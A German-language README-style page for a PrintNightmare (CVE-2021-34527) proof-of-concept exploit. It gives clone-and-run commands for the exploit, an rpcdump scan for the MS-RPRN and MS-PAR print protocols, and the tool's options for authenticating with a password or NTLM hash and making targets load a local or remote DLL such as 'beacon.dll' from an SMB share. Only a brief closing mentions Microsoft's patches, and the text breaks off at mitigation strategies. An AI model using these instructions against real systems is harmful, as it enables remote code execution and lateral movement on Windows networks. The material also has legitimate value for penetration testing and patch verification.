
PrintNightmare (CVE-2021-34527) PoC-Exploit
Diese Version des PrintNightmare-Exploits basiert auf dem Code, der von Cube0x0 erstellt wurde, und bietet die folgenden Funktionen:
MS-RPRN als auch MS-PAR-Protokolle (in CMD-Argumenten definieren).Vor der Ausführung installieren Sie die neueste Version von impacket:
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 setup install
git clone https://github.com/m8sec/CVE-2021-34527
cd CVE-2021-34527
python3 CVE-2021-34527.py -h
Impackets rpcdump.py kann verwendet werden, um nach MS-PAR- und MS-RPRN-Protokollen zu suchen:
>> rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
Protocol: [MS-RPRN]: Print System Remote Protocol
Alternativ kann der Scanner ItWasAllADream von byt3bl33d3r verwendet werden, um Ziele zu scannen und die PrintNightmare RCE-Sicherheitsanfälligkeit zu validieren.

-v VERBOSE Enable verbose logging from SMB server
-t TIMEOUT Connection timeout
Authentication:
-u USERNAME Set username
-H HASH, -hashes Use NTLM Hash for authentication
-p PASSWORD Set password
-d DOMAIN Set domain
--local-auth Authenticate to target host, no domain
DLL Execution:
-dll DLL Path to local DLL file to execute "beacon.dll"
--remote-dll REMOTE_DLL Remote dll "\\192.168.1.25\Share\beacon.dll"
-share SHARE Set local SMB share name
--local-ip LOCAL_IP Set local IP (defaults to primary interface)
Target(s):
-pDriverPath PDRIVERPATH Define Driver path. Example 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
-port [destination port] Destination port to connect to SMB Server
-proto {MS-RPRN,MS-PAR} Target protocol (Default=MS-RPRN)
target 192.168.2.2, target.txt, 10.0.0.0/24 (positional)
Microsoft hat mehrere Patches für PrintNightmare veröffentlicht, der letzte am Patch Tuesday im September 2021. Dies behob die zugrunde liegende Sicherheitsanfälligkeit und später entdeckte Problemumgehungen. Weitere Informationen finden Sie in der offiziellen Anleitung von Microsoft:
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
Zusätzliche Strategien zur Minderung dieser Sicherheitsanfälligkeit umfassen: